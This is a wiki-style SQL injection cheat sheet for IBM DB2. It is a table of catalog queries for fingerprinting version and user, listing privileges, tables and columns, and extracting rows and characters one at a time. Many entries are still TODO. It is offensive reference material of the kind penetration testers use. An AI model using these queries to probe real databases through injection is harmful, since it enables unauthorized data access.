====== Hacking - SQL Injection Cheat Sheet (DB2) ======
|Version|select versionnumber, version_timestamp from sysibm.sysversions;|
|Comments|select blah from foo; -- comment like this|
|Current User|select user from sysibm.sysdummy1;\\ select session_user from sysibm.sysdummy1;\\ select system_user from sysibm.sysdummy1;|
|List Users|N/A (I think DB2 uses OS-level user accounts for authentication.)\\ Database authorities (like roles, I think) can be listed like this:\\ select grantee from syscat.dbauth;|
|List Password Hashes|N/A (I think DB2 uses OS-level user accounts for authentication.)|
|List Privileges|select * from syscat.tabauth; -- privs on tables\\ select * from syscat.dbauth where grantee = current user;\\ select * from syscat.tabauth where grantee = current user;|
|List DBA Accounts|TODO|
|Current Database|select current server from sysibm.sysdummy1;|
|List Databases|SELECT schemaname FROM syscat.schemata;|
|List Columns|select name, tbname, coltype from sysibm.syscolumns;|
|List Tables|select name from sysibm.systables;|
|Find Tables From Column Name|TODO|
|Select Nth Row|select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;|
|Select Nth Char|SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b|
|Bitwise AND|[[http://www.tar.hu/sqlbible/sqlbible0084.html|This page]] seems to indicate that DB2 has no support for bitwise operators!|
|ASCII Value -> Char|select chr(65) from sysibm.sysdummy1; -- returns 'A'|
|Char -> ASCII Value|select ascii('A') from sysibm.sysdummy1; -- returns 65|
|Casting|SELECT cast('123' as integer) FROM sysibm.sysdummy1;\\ SELECT cast(1 as char) FROM sysibm.sysdummy1;|
|String Concatenation|SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'\\ select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'|
|If Statement|TODO|
|Case Statement|TODO|
|Avoiding Quotes|TODO|
|Time Delay|???. See [[https://www.microsoft.com/technet/community/columns/secmvp/sv0907.mspx|Heavy Queries]] article for some ideas.|
|Make DNS Requests|TODO|
|Command Execution|TODO|
|Local File Access|TODO|
|Hostname, IP Address|TODO|
|Location of DB files|TODO|
|Default/System Databases|TODO|
----
===== References =====
https://www.michaelboman.org/books/sql-injection-cheat-sheet-db2